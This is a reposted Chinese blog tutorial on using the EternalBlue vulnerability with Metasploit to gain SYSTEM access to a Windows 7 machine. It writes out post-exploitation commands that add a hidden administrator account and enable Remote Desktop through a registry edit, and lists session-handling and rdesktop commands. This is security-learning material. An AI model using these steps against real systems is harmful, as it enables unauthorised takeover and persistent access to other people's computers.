标签：网络安全 会话 kali sessions w7 命令 v6 net 漏洞

利用永恒之蓝漏洞实现w7远程操控
首先目标要关闭防火墙



然后打开Metasploit

输入永恒之蓝漏洞编码

复制运行第二条辅助项目

设置漏洞选项

运行项目，结果为有一个可能是漏洞的w7漏洞

然后选择第三个项目，即***项目，并设置漏洞选项


输入漏洞***命令 exploit

于是我们便进入了对方的w7命令终端，身份为最高权限者system（系统）

下一步我们输入命令net user 用户名 密码 /add来创建一个用户
然后用一个 net localgroup administrators 用户名 /add 命令来将刚才的用户拉入讨论组
然后输入命令 net localgroup administrators 查看管理员

输入命令REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f 来开启远程桌面端口3389

/v 所选项之下要添加的值名。
/t RegKey 数据类型
/d 要分配给添加的注册表 ValueName 的数据。
/f 不用提示就强行覆盖现有注册表项。
现在我们就可以利用其他漏洞进行以远程桌面控制为渠道的******了

sessions -l 列出会话
sessions -i <id>选择会话
sessions -k <id> 结束会话
<ctrl> z 把会话放在后台
<ctrl> c 结束会话

kali终端窗口
rdesktop 192.168.4.239:3389 远程连接命令

标签：网络安全,会话,kali,sessions,w7,命令,v6,net,漏洞
来源： https://blog.51cto.com/14216854/2381436

本站声明： 1. iCode9 技术分享网（下文简称本站）提供的所有内容，仅供技术学习、探讨和分享；
2. 关于本站的所有留言、评论、转载及引用，纯属内容发起人的个人观点，与本站观点和立场无关；
3. 关于本站的所有言论和文字，纯属内容发起人的个人观点，与本站观点和立场无关；
4. 本站文章均是网友提供，不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属；如您发现该文章侵犯了您的权益，可联系我们第一时间进行删除；
5. 本站为非盈利性的个人网站，所有内容不会用来进行牟利，也不会利用任何形式的广告来间接获益，纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。